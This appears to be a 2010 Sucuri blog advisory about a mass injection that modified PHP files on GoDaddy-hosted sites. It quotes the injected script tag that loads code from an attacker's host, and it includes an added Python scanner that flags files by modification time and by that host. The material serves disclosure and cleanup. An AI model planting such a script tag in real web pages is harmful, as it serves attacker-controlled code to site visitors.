Update2: Reply from GoDaddy: https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html
Update: Code used to exploit found: https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
< script src =”http://holasionweb.com/oo.php”>< /script>
The changes were all made this morning between 2am and 3am, changing all PHP files with this new code.
All the sites we checked so far were updated (WordPress 2.9.2) and using good permissions. Plus, not all of them were using WordPress. I don’t want to see the “users were not updated” excuse again, please. GoDaddy, any ideas as to what is going on?
Note that our previous solution will still clean it up: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
The details are all the same as in the previous attack, just using a new host (and new victims):
Notice that this is not related to one specific platform. Most of the sites we checked were using WordPress, but some were on Joomla or using other web applications. Plus, it is very annoying, since all the PHP files get modified.
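A triage check for the pattern described above, added here as an example (it is not Sucuri's cleanup script): it walks a document root and flags PHP files that were modified inside a given time window or that reference the host from the injected tag. The function names, the sample tree and the dates in `demo()` are constructed for illustration, and the host is matched as plain text only.

```python
import os
import re
import tempfile
from datetime import datetime

BAD_HOST = "holasionweb.com"  # host from the injected tag shown in the post
# Tolerates the stray spaces and straight or curly quotes in the post's copy of the tag.
SCRIPT_SRC = re.compile(
    r"<\s*script[^>]*\bsrc\s*=\s*[\"'\u201c\u201d]?\s*https?://([^/\"'\u201c\u201d\s>]+)",
    re.IGNORECASE)

def scan_php_tree(root, window_start, window_end, bad_host=BAD_HOST):
    """Return {relative path: set of reasons} for .php files worth a closer look."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = set()
            mtime = datetime.fromtimestamp(os.stat(path).st_mtime)  # local time
            if window_start <= mtime < window_end:
                reasons.add("modified-in-window")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = {h.lower() for h in SCRIPT_SRC.findall(fh.read())}
            # Exact host or a subdomain of it, so lookalike names do not match.
            if any(h == bad_host or h.endswith("." + bad_host) for h in hosts):
                reasons.add("script-from-bad-host")
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings

def demo():
    """Scan a constructed tree (all file contents and timestamps are made up)."""
    start, end = datetime(2010, 5, 1, 2, 0), datetime(2010, 5, 1, 3, 0)
    hit = datetime(2010, 5, 1, 2, 30).timestamp()
    old = datetime(2010, 4, 1, 12, 0).timestamp()
    tag = "< script src =\u201dhttp://holasionweb.com/oo.php\u201d>< /script>"
    samples = {
        "index.php": ('<?php echo "hi"; ?>\n' + tag, hit),
        "cache/old.php": (tag, old),  # tag present, mtime outside the window
        "lib/util.php": ('<script src="http://holasionweb.com.example/x.js">', old),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (body, ts) in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.utime(path, (ts, ts))
        return scan_php_tree(root, start, end)
```

File modification times can be reset by whoever wrote the file, so a file with no findings is not proof that it is clean; comparing against a known-good copy of the application is the stronger check.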
As always, if you are having difficulties getting your site cleaned up, send us an email at firstname.lastname@example.org or visit our site: http://sucuri.net. We can get your sites cleaned up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.